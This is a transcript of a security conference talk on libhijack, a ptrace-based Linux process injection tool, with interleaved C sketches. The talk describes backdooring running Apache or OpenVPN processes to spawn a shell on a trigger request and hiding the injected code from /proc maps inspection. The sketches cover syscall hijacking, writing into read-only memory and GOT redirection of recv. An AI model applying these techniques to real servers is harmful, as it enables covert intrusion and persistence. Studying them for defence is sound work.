My name is Shawn Webb, I'm a member of SoldierX, and this talk is called Runtime Process Insemination. It's brought to you by SoldierX. Who am I? I'm just another random blogger on the intertubes. I run a tech blog called 0xfeedface.org, and I'm a professional security analyst; I've been working professionally for about three and a half to four years. I've been programming in C89 for 12 years. It is the language of love; I absolutely love it. I'm a member of SoldierX, Binary Revolution and Hack3R. All three are sister communities related to each other, and they're really fun, really good communities to be a member of. If you want to hang around on IRC with like-minded people, check those communities out. I have a few disclaimers. The opinions and views expressed here are solely mine, not my employer's; they're not paying me to speak here. My talk is semi-random: there's a lot of background information I need to cover, and I'm going to tie it together at the end. It's all going to make sense at the end. In this talk, almost nothing new is explained. The theory is very well known; you can find the underlying theory in Phrack, on Google and in quite a few other resources. Today, though, I am going to explain a slightly new technique, a new spin on things. The presentation and tools discussed here are for educational and ethical purposes only. I'm just saying this to cover my butt. I make a few assumptions in this talk. I assume you know what Linux is, and if you don't, I'm sorry. The same concepts I talk about here carry over to Windows and OS X. I assume you have a basic knowledge of C and 32-bit Linux memory management; the concepts apply to both 32-bit and 64-bit Linux and to any other OS you want to use. I assume you know what printf, memset, recv and libc are, that kind of stuff.
I assume you know what a heap, a stack and an anonymous memory mapping are, and what the differences among the three are. I assume you have the ability and desire to think abstractly. We're going to be talking about some abstract ideas, sometimes in parallel, and it can get confusing. If you get confused, I'll be in the Q&A room for track three after this talk. This presentation and the tool we're releasing at the end of the day today assume an unmodified memory layout: no grsecurity, no PaX, no ASLR. Even if you do have a modified memory layout, you can get past it, even grsecurity; it takes a bit of work, but it's possible. A little bit of history. For the past few years, I've been diving into CGI and web application vulnerabilities, and I used connect-back shellcode: after exploiting the web app, I'd inject shellcode that would connect back to me and drop me into a shell. I needed reliable random access. I needed to be able to get dropped into a shell no matter where I am: at home, at a friend's place, in a hotel, at McDonald's, it doesn't matter. Firewall holes are a bit of a problem, because if I'm at a friend's place or at McDonald's, if I'm not at home, I don't control the network. I could pwn the network and gain control of it, but I really just want to take care of my end goal, my target. So I needed a way to reuse existing connections to the web server. I also needed a way to covertly sniff traffic: at one point the traffic was wrapped in SSL for HTTPS, and I needed to grab the decrypted traffic. So I created a project called libhijack. We're going to discuss it a bit more, and we're going to release a new version at DEF CON today, if the network permits.
So, to set the stage: I've got a shell via a CGI web application exploit, and I need a reliable way to get back in. Apache is a really good candidate to target because it's already listening for connections; it already has its front door open saying, come right on in. To reach my end goal, I need to modify the Apache process somehow so that it runs a shell when a special string is sent. When I send it "GET /shell HTTP/1.1", it drops me into a shell, and if I run the whoami command, it says apache. To accomplish that, I need to hook certain functions at runtime. There are certain techniques for getting your shellcode stored and run. You can store your shellcode on the stack. That used to be really popular: Aleph One's article "Smashing the Stack for Fun and Profit" uses the stack, and that's where most attackers used to put their code. However, on most systems today the stack is non-executable, so that's not reliable. You could store your shellcode at the current instruction pointer, EIP. That would work, but it mucks up the original code. What you have to do then is back up the code that was going to run, overwrite it with your shellcode, and restore the backup after your shellcode has run. In the previous talk, the Jugaad talk, that's what the author did. But we're going to dive a little further into a new technique, because the problem with that technique is that your shellcode only runs once. In that paradigm, that mode of thinking, your shellcode can only run once. We need our shellcode, our malicious code, to run every time the string "GET /shell HTTP/1.1" is sent, so it needs to run multiple times, not just once. We could store the shellcode on the heap, but on a lot of systems today the heap is non-executable too.
It's becoming more popular to mark the heap non-executable. You could use LD_PRELOAD, and that would be a great technique, but LD_PRELOAD only takes effect when a process starts. Apache is already running, and restarting it would mean gaining root on the system. Really, you don't ever need to root a box unless you're doing some crazy things. So let's talk a little about process loading: what happens when the execve system call is called. The kernel first checks that the file exists and that you have permission to run it. The kernel then loads what is called the runtime linker, which a lot of people call the RTLD. The kernel loads the process metadata and initializes the stack. On 32-bit Intel Linux, the metadata is located at the hex address 0x08048000 (the traditional base address for non-PIE executables). The runtime linker then finishes loading the process into memory. It loads all the shared objects, all the dependencies (for you Windows guys, those are DLLs), and it finds them by looking in the .dynamic section of your binary for the DT_NEEDED entries. It then fills in what are called the procedure linkage table and global offset table for the needed dynamic functions; we're going to dive deep into the PLT/GOT later in the talk. It then calls the initialization routines and finally calls main, returning control to your actual program. ELF. Best movie ever. I love this movie. This really isn't related to the talk, but I'm big on Christmas; I started watching it in November. ELF is the Executable and Linkable Format. It was created for System V, and Linux adopted it. Windows' PE/COFF format and OS X's Mach-O format fill the same role on those systems. All ELF is, is metadata: data that describes data. It tells the runtime linker what to load and how to load it, describing where to load the different parts of the object file.
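To make the ELF metadata concrete, here is a minimal sketch, assuming a Linux system with glibc's <elf.h> and <link.h> (the ElfW() macro selects the 32-bit or 64-bit types matching the current build, so the file being read must match the build's word size). It reads a file's main ELF header, checks the magic bytes, and walks the program headers, printing each PT_LOAD segment's virtual address, size and access rights. The function name list_load_segments is made up for illustration; it is not part of libhijack.

```c
#include <elf.h>
#include <link.h>   /* ElfW(): Elf32_* or Elf64_* types matching this build */
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: print the PT_LOAD program headers of the ELF file at
 * `path` and return how many there are, or -1 if the file can't be read or
 * isn't ELF. *has_dynamic is set to 1 if a PT_DYNAMIC header is present. */
int list_load_segments(const char *path, int *has_dynamic)
{
    ElfW(Ehdr) eh;
    ElfW(Phdr) ph;
    int i, loads = 0;
    FILE *f;

    *has_dynamic = 0;
    f = fopen(path, "rb");
    if (f == NULL)
        return -1;
    if (fread(&eh, sizeof eh, 1, f) != 1 ||
        memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0) {
        fclose(f);
        return -1;
    }

    /* The main header says where the program header table starts
     * (e_phoff), how many entries it has and how big each one is. */
    for (i = 0; i < eh.e_phnum; i++) {
        long off = (long)(eh.e_phoff + (ElfW(Off))i * eh.e_phentsize);

        if (fseek(f, off, SEEK_SET) != 0 || fread(&ph, sizeof ph, 1, f) != 1)
            break;
        if (ph.p_type == PT_DYNAMIC)
            *has_dynamic = 1;
        if (ph.p_type == PT_LOAD) {
            loads++;
            printf("LOAD vaddr=%#lx memsz=%#lx %c%c%c\n",
                   (unsigned long)ph.p_vaddr, (unsigned long)ph.p_memsz,
                   (ph.p_flags & PF_R) ? 'r' : '-',
                   (ph.p_flags & PF_W) ? 'w' : '-',
                   (ph.p_flags & PF_X) ? 'x' : '-');
        }
    }
    fclose(f);
    return loads;
}
```

Called on "/proc/self/exe", it lists the running program's own loadable segments; for a non-PIE 32-bit binary the first PT_LOAD would typically start at 0x08048000.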
An object file is just a generic term: it can mean a shared object, your program, or an object file in the sense of what the compiler produces before you link everything together. An object file contains a main ELF header, which contains pointers to other headers, and these other headers are the really important ones. They include the program headers; for your object file to work, you need at least one entry. A program header contains the virtual address, that is, where in memory the segment will be stored; the access rights (read, write and execute); and the alignment the segment must satisfy. You also have section headers. You don't have to have any section headers at all; they give a finer-grained description of the file's contents, including a string table, debugging entries if there are any, and compiler comments. When you strip a program, you're stripping out most, if not all, of the section headers. Fun little trivia: old-school viruses used to store their code in the compiler comments section. The dynamic headers point to the relocation entries and to the stubs in the PLT/GOT, and that is the jackpot. That's where we're going to spend most of our time. ptrace is the debugging facility for Linux. It is a kernel system call, and GDB, the GNU debugger, relies heavily on it; if ptrace didn't exist, GDB wouldn't. It allows you to read from and write to arbitrary memory locations, as long as they're valid, and you can even write to memory locations that are marked read-only. It allows you to get and set registers. So basically, when you use ptrace, you are God: you own the process, you own the debuggee. When we talk about a debugger and a debuggee, the debuggee becomes the child of the debugger. Let's say we're a Firefox developer, and we're finally getting around to fixing the memory leaks that every Firefox user complains about.
And we're going to use GDB to do it. So we have Firefox and GDB: two unrelated programs, started at different times. When you attach GDB to Firefox, conceptually speaking, in the kernel Firefox becomes a child of the debugger, as if GDB had spawned Firefox, even though they were started at different times from different places. So when you attach a debugger to a debuggee, the debuggee becomes a child of the debugger. I'm going to talk about child processes and parent processes because it's a little easier to speak that way: the parent is the debugger, which is libhijack or GDB, and the child is the debuggee, the victim process. ptrace is destructive; you can do a lot of things with ptrace that it really wasn't meant to do. In fact, I think the original ptrace engineer was likely evil. He knew it could be abused; he probably even created some back doors on systems with it. So we have some arbitrary code that we need to store. We can't store it on the stack, we can't store it on the heap, and we can't store it where EIP points. Where can we store it? What we need to do is allocate memory in the child. But unlike on Windows and OS X, we cannot allocate from the parent process. In Linux, FreeBSD and Solaris, there is no API to allocate memory in a different process, so the child process must be the one to allocate. That means we need to find where the kernel is called, and the kernel is called through a software interrupt, int 0x80. We need to find where int 0x80 is in the program. The problem is that the program itself will likely never call the kernel directly; instead, it calls library functions, which call the kernel. libc calls the kernel everywhere, so libc is a great place to find where the kernel is called.
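The talk skips how int 0x80 is actually located. One simple way to picture it, offered as an assumption rather than as libhijack's exact method, is to take the code bytes of a libc function (found through the symbol table) and scan them for the two-byte encoding of int 0x80, which is 0xCD 0x80. On x86-64, system calls are normally made with the syscall instruction (0x0F 0x05) instead. find_int80 is a hypothetical name.

```c
#include <stddef.h>

/* Return the offset of the first "int 0x80" (opcode bytes CD 80) in
 * code[0..len), or -1 if there is none. This is a naive byte scan: it
 * does not decode instructions, so it could also match CD 80 bytes that
 * straddle two other instructions or sit inside embedded data. */
long find_int80(const unsigned char *code, size_t len)
{
    size_t i;

    for (i = 0; i + 1 < len; i++)
        if (code[i] == 0xcd && code[i + 1] == 0x80)
            return (long)i;
    return -1;
}
```

For example, in the bytes b8 5a 00 00 00 cd 80 c3 (mov eax, 90; int 0x80; ret), the instruction starts at offset 5.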
We can find a library function that calls the kernel by crawling through the ELF metadata, through all these different headers. The main ELF header contains a pointer to the program headers. The program headers contain a pointer to the dynamic section, and the dynamic section has a pointer to the global offset table. The second entry of the global offset table contains a pointer to the link map. (I said second, and the slide says 1, because we're starting from a zero index.) The link map is a structure created and maintained by the runtime linker and dlopen, and it points to each shared object's ELF headers. Every single object file, your program and each of its dependencies, has ELF headers, and those headers include a symbol table. A symbol table is basically all the functions, all the global variables, all that kind of stuff that gets loaded in memory. So we parse through the ELF headers starting at that hex address (0x08048000); the ELF headers include lists of loaded functions. That's how we found int 0x80: by crawling through all the ELF headers. I'll save you the nitty-gritty details because they're boring. Having found int 0x80 in a shared object, we back up the registers, since we're about to mess with some of them. We set EIP to the address where we found int 0x80, set up the stack to call the mmap system call, and continue execution until mmap finishes. mmap requires you to pass in certain data, in a structure (on 32-bit Linux, the old mmap system call takes a single pointer to a block of arguments): where in memory you want the new mapping, how long you want it to be, the access rights, that kind of thing. We store that structure on the stack. That part never gets executed; it's just data passed to mmap, so that's completely okay to do. After calling mmap, we have a newly allocated mapping.
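Here is a sketch of the register and stack setup just described, assuming 32-bit x86 Linux, where system call 90 is the old mmap that takes a single pointer (in EBX) to a block of six 32-bit arguments. The struct regs32 type and the setup_mmap_call helper are hypothetical stand-ins: a real tool would back up and modify the target's registers through ptrace (for example with PTRACE_GETREGS and PTRACE_SETREGS) and write the argument block below the target's ESP with PTRACE_POKEDATA. Here the block is copied into a local buffer so the logic can be checked.

```c
#define _GNU_SOURCE          /* MAP_ANONYMOUS */
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>

#define NR_OLD_MMAP_I386 90  /* i386 __NR_mmap: takes a pointer to its args */

/* Argument block for the i386 old mmap system call. */
struct mmap_arg32 {
    uint32_t addr, len, prot, flags, fd, offset;
};

/* Hypothetical snapshot of the few i386 registers this step touches. */
struct regs32 {
    uint32_t eax, ebx, esp, eip;
};

/* Point the child at int 0x80 so that resuming it runs
 * mmap(NULL, len, PROT_READ | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0).
 * `stack_bytes` receives the argument block that would be written at the
 * new ESP; the return value is the block's size. */
size_t setup_mmap_call(struct regs32 *r, uint32_t int80_addr, uint32_t len,
                       unsigned char *stack_bytes)
{
    struct mmap_arg32 a;

    a.addr = 0;                             /* let the kernel choose */
    a.len = len;
    a.prot = PROT_READ | PROT_EXEC;         /* deliberately not writable */
    a.flags = MAP_PRIVATE | MAP_ANONYMOUS;  /* same values on i386 and x86-64 */
    a.fd = (uint32_t)-1;
    a.offset = 0;

    r->esp -= (uint32_t)sizeof a;           /* make room on the child's stack */
    memcpy(stack_bytes, &a, sizeof a);
    r->ebx = r->esp;                        /* EBX -> argument block */
    r->eax = NR_OLD_MMAP_I386;              /* system call number */
    r->eip = int80_addr;                    /* resume at the int 0x80 we found */
    return sizeof a;
}
```

After the child executes int 0x80, EAX holds either the new mapping's address or a small negative errno value, so it is worth checking EAX before restoring the saved registers.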
After the mmap call returns, the EAX register contains the address of that newly allocated mapping. And this right here is the new technique, by the way; I forgot to mention that. You can write to that newly allocated mapping even if it is marked non-writable. Even if it's marked read and execute, or just read-only, or execute-only, you can write to it, because with ptrace you're God. Then you restore the backed-up registers, as if nothing happened, and push a return address onto the stack, because the shellcode needs to know where to return control. Apache was probably sitting there listening for connections, and we want our shellcode to run and then have Apache continue doing its normal thing. To push the return address, we decrement ESP by the size of an unsigned long, which is 4 bytes on 32-bit and 8 bytes on 64-bit, and then write the value of EIP to the stack location ESP now points to. We then write the shellcode to the newly allocated mapping, set EIP to the location of the shellcode, detach from the process, sit back, relax and enjoy life. We've just injected our shellcode and got it to run. But wait, there's more: hijacking functions. We injected our shellcode and got it to run once, but remember, we wanted it to run more than once: any time recv is called, our code needs to run. So let's look at the global offset table and the procedure linkage table. The GOT is, in essence, an array of function addresses. Any time your program calls printf, recv, memset or any other function that comes from a shared object, it doesn't call that function directly. It calls a stub in the PLT, which jumps through the function's entry in the GOT to printf. That allows your program and all of its shared objects, all its dependencies, to be loaded at completely random places in memory.
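The central claim of this technique, that ptrace can write into a mapping the target itself cannot write to, can be checked with a small self-contained program. This sketch assumes Linux and that ptrace is permitted in your environment. It maps a page read-only, forks a child that asks to be traced (PTRACE_TRACEME) and stops itself, then uses PTRACE_POKEDATA from the parent to write a word into the child's read-only page. The child, resumed by PTRACE_DETACH, only reads the page and reports through its exit status whether it saw the value. Attaching to an already-running process such as Apache would use PTRACE_ATTACH instead; the name poke_readonly_page is hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <signal.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define MAGIC 0x41414141L

/* Returns 0 if a ptrace write into the child's PROT_READ page succeeded
 * and the child saw the new value, -1 otherwise. */
int poke_readonly_page(void)
{
    size_t pagesz = (size_t)sysconf(_SC_PAGESIZE);
    long *page;
    long word;
    pid_t pid;
    int status, ok;

    /* Read-only private page; the child inherits it at the same address. */
    page = mmap(NULL, pagesz, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return -1;

    pid = fork();
    if (pid < 0) {
        munmap(page, pagesz);
        return -1;
    }
    if (pid == 0) {
        /* Child (debuggee): become traced and stop until the parent is done. */
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
            _exit(2);
        raise(SIGSTOP);
        _exit(*page == MAGIC ? 0 : 1);   /* only ever reads the page */
    }

    /* Parent (debugger): wait for the child's SIGSTOP. */
    if (waitpid(pid, &status, 0) != pid || !WIFSTOPPED(status)) {
        munmap(page, pagesz);
        return -1;
    }

    /* Write into the non-writable page, then read it back. */
    ok = ptrace(PTRACE_POKEDATA, pid, page, (void *)MAGIC) != -1;
    if (ok) {
        errno = 0;
        word = ptrace(PTRACE_PEEKDATA, pid, page, NULL);
        ok = (errno == 0 && word == MAGIC);
    }

    if (ok)
        ptrace(PTRACE_DETACH, pid, NULL, NULL);   /* resume, no signal */
    else
        kill(pid, SIGKILL);
    if (waitpid(pid, &status, 0) != pid)
        ok = 0;
    munmap(page, pagesz);
    return (ok && WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

The same kernel behavior is what lets an ordinary debugger plant breakpoints in read-only code pages.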
The PLT/GOT indirection lets your program still call printf, recv and memset no matter where they're loaded in memory. All your referenced functions are in the PLT/GOT, the procedure linkage table and global offset table. We're going to use a technique that Silvio Cesare architected, called PLT/GOT redirection. We create a stub entry in our shellcode and overwrite that stub address with the address where the function is really loaded in memory. Then we replace the function's corresponding entry in the GOT with the address of our shellcode. That's the redirection; that's it. You've now hijacked a function. But be careful when you're hijacking functions, because multiple shared objects can implement functions of the same name, even with different signatures. Let's say Apache were, hypothetically, written in ugly C++, and it used libc as well, so it uses both libc++ and libc. Let's say libc++ implemented printf, and libc implemented printf as well. So we have two libraries that implement printf. That is completely valid; there's no problem with that. They can even have different signatures, different function prototypes accepting different arguments and returning different values. So you want to make sure that you target the correct function; you need to know your target well when you're hijacking functions. What I do is set up a VM and mimic the victim: the same OS, the same patch levels, even the same proprietary software. I mimic my victim 100% so that I know what I'm getting myself into, can dive into it deeply, and don't have any surprises. Once you hijack a function, you cannot reliably remove the hijack, because of that multiple-shared-object issue: libc and libc++, or name your library, can implement functions of the same name. So we want to be able to inject shared objects. Why do we want to do that?
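The redirection can be illustrated entirely inside one process. In this sketch, a one-element array named fake_got stands in for the target's GOT slot for recv, real_recv_stub plays the role of the stub entry that gets overwritten with the real function's address, and hooked_recv is the payload that watches for the trigger string "GET /shell HTTP/1.1". All of these names are hypothetical; in the real attack, both writes would be PTRACE_POKEDATA calls against the victim's memory, and the payload would spawn a shell instead of setting a flag.

```c
#define _GNU_SOURCE
#include <string.h>
#include <sys/types.h>

typedef ssize_t (*recv_fn)(int fd, void *buf, size_t len, int flags);

recv_fn fake_got[1];        /* stand-in for the target's GOT entry for recv */
recv_fn real_recv_stub;     /* "stub entry": patched with the real address */
int shell_requested;        /* a real payload would spawn a shell instead */

static const char TRIGGER[] = "GET /shell HTTP/1.1";

/* The payload: call the real function through the stub, then inspect
 * the data it returned for the trigger string. */
ssize_t hooked_recv(int fd, void *buf, size_t len, int flags)
{
    ssize_t n = real_recv_stub(fd, buf, len, flags);

    if (n >= (ssize_t)(sizeof TRIGGER - 1) &&
        memcmp(buf, TRIGGER, sizeof TRIGGER - 1) == 0)
        shell_requested = 1;
    return n;
}

/* PLT/GOT redirection: save the resolved address into the stub, then
 * point the GOT slot at the hook. Later calls through the slot land there. */
void redirect_got_slot(recv_fn *slot, recv_fn hook, recv_fn *stub)
{
    *stub = *slot;   /* 1. remember where the function really lives */
    *slot = hook;    /* 2. send every future call to our code */
}
```

Because the hook calls through the saved stub, the victim still receives its data normally, which is what lets the server keep working while it carries the backdoor.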
We want to inject shared objects because we don't want to have to write a ton of shellcode. Assembly is tedious and architecture-dependent, and it doesn't let you move as freely as you'd need to if you had to pwn a lot of systems in a short amount of time. We want to write in C or use other libraries. The possibilities are endless: you could write your malicious code in Haskell or Erlang if you wanted. I don't know why you would, but you could. There are two ways of doing it. There's the cheating way: use stub shellcode that calls dlopen. That's what every single project out there does: InjectSO does it, Jugaad does it, and right now libhijack does it as well. And there's the real way, which is to reimplement dlopen in the parent process, in libhijack or your debugger. In the cheating way, you allocate a new memory mapping, using the new technique I showed you for forcing the child to allocate one, and you store some auxiliary data in it: the filesystem path where the shared object resides, the name of the function to hijack, and the stub shellcode. The stub shellcode calls dlopen to open your shared object and dlsym to find the address of your malicious function. It then replaces the global offset table entry with the address found via dlsym. So it finds out dynamically where your function is located in memory and puts that address in the GOT. The cheating way has some advantages. It's easy: I've written the assembly code, and I'm releasing it today. It's extensible: to hijack more functions, you literally just copy and paste code. It's fast: handwritten assembly is usually fast, if you write it right. There are some disadvantages, though. When you use this technique, your shared object gets an entry in the maps file, /proc/<pid>/maps.
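For reference, here is what the cheating-way stub does, written in C rather than assembly. It is a sketch under assumptions: the path and symbol name would come from the auxiliary data stored in the new mapping, `slot` stands in for the GOT entry being replaced, and stub_load_and_patch is a hypothetical name. On glibc versions older than 2.34, link with -ldl.

```c
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stddef.h>

/* Load `path` (NULL means the main program), look up `symbol`, and store
 * its address in *slot. Returns 0 on success, -1 on failure. */
int stub_load_and_patch(const char *path, const char *symbol, void **slot)
{
    void *handle = dlopen(path, RTLD_NOW);
    void *sym;

    if (handle == NULL)
        return -1;
    dlerror();                   /* clear any stale error state */
    sym = dlsym(handle, symbol);
    if (sym == NULL) {
        dlclose(handle);
        return -1;
    }
    *slot = sym;                 /* the "GOT write"; the library stays loaded */
    return 0;
}
```

Because dlopen registers the library with the runtime linker, the library also becomes visible in /proc/<pid>/maps.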
So when a system administrator thinks Apache is acting weird, he thinks, hmm, it's been pwned. One of the things he'll do for forensic purposes is look in /proc/<pid>/maps for anything that might be malicious, and because you used dlopen, he'll see that your malicious shared object was loaded. You also rely on architecture-dependent stub shellcode. Maybe you're pwning a web farm that has a mix of 32-bit and 64-bit systems. Now, instead of having one set of code, you have to duplicate your code and do the exact same thing for 64-bit, which on Linux has a slightly different calling convention than 32-bit. In the real way, you reimplement dlopen by loading the dependencies of your malicious shared object yourself. Some of the dependencies can be loaded via dlopen, and some might not need to be loaded at all; libc is in just about every single program out there, and I don't think I've ever seen a program that didn't depend on libc. So, for the most part, you load your dependencies by hand. If you want to implement a sniffer using libpcap inside Apache, which you can do with libhijack, you wouldn't want a system administrator to look at the /proc/<pid>/maps file and see that libpcap is loaded. If I were a system administrator and saw that, I'd be like, what the freak? We've been pwned. So you create memory mappings and write the shared object's data into them. You look at the program headers, which tell you how to load that shared object, and you load what they tell you to into these new mappings. Then you patch into the runtime linker. That's important, because the runtime linker is the one responsible for resolving where in memory functions like printf, memset and mmap are located. You run the initialization routines of the dependencies you loaded by hand.
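Loading by hand starts with turning each PT_LOAD program header into a memory mapping. The sketch below, assuming Linux with glibc's <elf.h>/<link.h> and a page-aligned load base, computes the page-aligned start address, length, file offset and protection for one segment; struct seg_map and phdr_to_map are hypothetical names. It deliberately leaves out everything after that step: zeroing the part between p_filesz and p_memsz (the .bss), applying relocations, and patching into the runtime linker.

```c
#include <elf.h>
#include <link.h>       /* ElfW() */
#include <sys/mman.h>

struct seg_map {
    unsigned long start;     /* page-aligned address to map at */
    unsigned long length;    /* whole pages covering the segment */
    unsigned long file_off;  /* page-aligned offset in the file */
    int prot;                /* PROT_* derived from p_flags */
};

/* Compute how to mmap one PT_LOAD segment of an object loaded at
 * `load_base` (assumed page-aligned). `pagesz` must be a power of two. */
void phdr_to_map(const ElfW(Phdr) *ph, unsigned long load_base,
                 unsigned long pagesz, struct seg_map *m)
{
    unsigned long vaddr = load_base + (unsigned long)ph->p_vaddr;
    unsigned long start = vaddr & ~(pagesz - 1);
    unsigned long end = (vaddr + (unsigned long)ph->p_memsz + pagesz - 1)
                        & ~(pagesz - 1);

    m->start = start;
    m->length = end - start;
    /* ELF requires p_offset and p_vaddr to agree modulo the segment's
     * alignment (normally at least a page), so backing the offset up by
     * the same amount as the address yields a page-aligned file offset. */
    m->file_off = (unsigned long)ph->p_offset - (vaddr - start);
    m->prot = ((ph->p_flags & PF_R) ? PROT_READ : 0) |
              ((ph->p_flags & PF_W) ? PROT_WRITE : 0) |
              ((ph->p_flags & PF_X) ? PROT_EXEC : 0);
}
```

For a segment with p_offset 0x1f08, p_vaddr 0x2f08 and p_memsz 0x200 loaded at base 0x10000000 with 4 KiB pages, this gives start 0x10002000, length 0x2000 and file offset 0x1000.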
You do not run the initialization routines for dependencies that were already loaded or that were loaded by dlopen. Then you use the PLT/GOT redirection technique to hijack the global offset table. There are some advantages to this. It's completely anonymous: you've hijacked recv in Apache, and when the system administrator cats /proc/<pid>/maps, he's not going to see anything out of the ordinary. He'll see, oh, libc is loaded, that's cool, and continue on his way. It's extensible; you can extend it really easily. It's really powerful. There's just one disadvantage: it takes a lot of freaking time to research and implement. I've been looking at doing it the real way, off and on, for one to two years. I know it from a high-level perspective, and I'm just barely starting to understand it at a really low level. It's really hard to implement; there are probably around a million lines of code to read through. It's a major project. Shared objects can have dependencies, and shared objects have their own procedure linkage table and global offset table. Up to this point, we were talking about the program's main PLT/GOT. But each shared object, because it can be loaded at a random spot in memory and can depend on other shared objects, has its own PLT/GOT. So you can hijack inside the main program, and you can hijack inside shared objects. To do that, you loop through the dynamic structures found in the link map and use the same PLT/GOT redirection technique against each shared object; it's exactly the same principle. You can even hijack shared objects that have been loaded via dlopen. Pidgin is a great example of a program that relies on that, and even Apache uses dlopen heavily: it implements just about everything as a plugin.
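Inside a process, glibc exposes the runtime linker's list of loaded objects through dl_iterate_phdr, which visits essentially the same objects you would reach by walking the link map from the outside. This in-process sketch assumes glibc; a tool like libhijack would instead follow the link_map pointers in the target's memory with PTRACE_PEEKDATA. For each object it prints the load address, the name (empty for the main program) and whether the object has a PT_DYNAMIC header, which is the starting point for finding that object's own PLT/GOT. count_loaded_objects and show_object are hypothetical names.

```c
#define _GNU_SOURCE
#include <link.h>
#include <stdio.h>

/* Called once per loaded object: the main program, its shared libraries,
 * and anything added later with dlopen. */
static int show_object(struct dl_phdr_info *info, size_t size, void *data)
{
    int *count = data;
    int i, has_dynamic = 0;

    (void)size;
    for (i = 0; i < info->dlpi_phnum; i++)
        if (info->dlpi_phdr[i].p_type == PT_DYNAMIC)
            has_dynamic = 1;
    printf("%#lx %s%s\n", (unsigned long)info->dlpi_addr,
           (info->dlpi_name && info->dlpi_name[0] != '\0')
               ? info->dlpi_name : "(main program)",
           has_dynamic ? "" : " (no PT_DYNAMIC)");
    (*count)++;
    return 0;   /* 0 means keep iterating */
}

int count_loaded_objects(void)
{
    int count = 0;

    dl_iterate_phdr(show_object, &count);
    return count;
}
```

Running it after a dlopen call shows the newly loaded library in the list, which is why plugins loaded at runtime are reachable by the same walk.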
Apache is basically a front end to all these plugins, all these back ends. And you can hijack shared objects that have been loaded via dlopen, because dlopen adds a new entry to the link map. libhijack makes injecting arbitrary code and hijacking dynamically loaded functions extremely easy. libhijack is currently around 1,800 to 1,900 lines of code, and I've made it so easy that you can inject your shellcode in as few as 8 lines of C. It loads shared objects via the cheating method right now, because the real way is really freaking hard to do. It has full 32-bit and 64-bit Linux support on the Intel platform, which includes AMD as well. I develop mainly on 32-bit and do most of my testing there, and I've abstracted all the architecture-dependent code away, so I don't have to test heavily on 64-bit or worry about architecture for the new features I write. Other OSes are coming soon: we're working right now on porting to FreeBSD, and we have some interest in porting to OS X. I'm always looking for help. This is a fun project. It's challenging; there are a lot of problems to solve in unique ways, and I'm always looking for help from programmers who write good C89. That's where my project is located; you all have CDs, so you can copy and paste that link. Clone it, fork it, whatever you want to do. At the end of the day, I'm going to release version 0.5 of libhijack. It's a major milestone release: you can hijack within shared objects. It does break the existing 0.3 and 0.4 API, but most of you, if not all of you, don't have to worry about that, because those releases were private, or semi-private. I fixed some massive memory leaks. Before this release, libhijack... Should I give it a go?
Anyway, I fixed some massive memory leaks. Before this release, libhijack's scope was pretty limited: it was mainly for hijacking the major functions your program calls. Now that you can hijack within shared objects, you can do whatever you want with libhijack. You can create a fuzzer or some sort of hypervisor; its possibilities are limited only by your imagination. Before this release, I really didn't care about memory leaks. I figured, ah, it's just going to do its thing and quit, and do it well, of course. But it had some major memory leaks: it would grow to 27 megs when I injected code into OpenVPN. I've trimmed that down, so now it only takes 256K when injecting into OpenVPN. Probably better than Firefox. There have also been various bug fixes. I had a few bugs with mmap calling mmap, and I fixed that. That one scared me; I was not expecting it. There are still some things left to do with libhijack. I need to figure out why certain functions don't show up in GOT resolution. There's some really weird issue where some functions just don't show up; I think I might be stopping the resolution a little prematurely. In 0.6, we're also hopefully going to support injecting shared objects the real way. That release is about six months out: I'm hoping I have about four months of research left, and then I'll do two months of implementation. We're working on porting to FreeBSD, but injecting shared objects the real way is more important than the FreeBSD port. If someone wants to go ahead and do the port for the 0.6 release, I'm accepting patches. Whoa. If you're looking for an adventure, port it to Android.
I'd love to see the security implications of it running on Android. Android uses ELF; it's Linux underneath, and everything runs on top of it. So you could hijack some sort of Java program and do some cool things with that on Android. I'd really love to see that. I'm always looking for help, so if you have some interesting ideas, implement them and send me a patch. So we know that we can hijack functions, and we now have a tool that makes that really easy. What can we do to prevent it? Some of us are security analysts and security engineers. One option is to make sure the PLT/GOT entries point to the correct library. But like I said, multiple libraries can implement functions of the same name. Yes? How do you do that? There's no way to do that. Oh, yeah. Okay. They hate me, don't they? Okay, so we can't really do that. It's not a viable option because, like I said earlier in the talk, libc and libc++ can implement functions of the same name, and at runtime there's no way to figure out which printf is the right printf. You can use DTrace. I am in love with DTrace. DTrace was created by Sun for Solaris, and it does non-destructive debugging: it allows you to dive down into your programs non-destructively. Oh, yeah. There we go. Okay. There are some destructive things you can do with DTrace, but you're very limited in what you can do. You can also limit ptrace usage. For example, the Apache user on Linux is able to use ptrace by default, and there really should be no reason for that. But Linux, being the great operating system it is, is never going to get true security. It's never going to get RBAC. I love this. Okay. RBAC is a great security solution that true enterprise operating systems have implemented. Solaris uses it.
Linux needs it, but I don't think Linux is going to get it, because of all the politics surrounding kernel development. You could use static binaries, but they are a major disk and memory hog; if you compiled everything statically, libhijack really wouldn't even work. Disk usage is not that big of a deal, but memory usage is. You could maybe create some sort of smart hypervisor solution. You could use grsecurity or PaX, but those only protect you to a certain extent. Or you could use a mixture of static and dynamic profiling. You profile the program before it's even run and say: this is what it's going to do, these are the shared objects and things it's going to load. Then, while it's running, you dynamically check whether its behavior matches the static profile: you watch for changes in the global offset table and make sure any changes reflect the static profile. But what about shared objects loaded via dlopen? Static profiling doesn't help with plugin architectures, and just about every program you use today, Firefox, Pidgin, Apache, just about anything, is all plugins. So I'm going to do a little demo and show you what happens when I inject a shared object. I need to set up a mirror on my display so things look right. Okay, right here. Can everyone see that? Is that good? All right. We have an OpenVPN server running right here, and we're going to connect to it. When I send it that command, it's going to drop me into a shell. Right now, you can see that when I send it, it works normally; it doesn't drop me into a shell. So we're going to run the inject-shared-object program, which I'm releasing today as part of libhijack. Oh, that's awesome. I'm running this demo as root, but because of the awesome security in Linux, it doesn't have to be run as root.
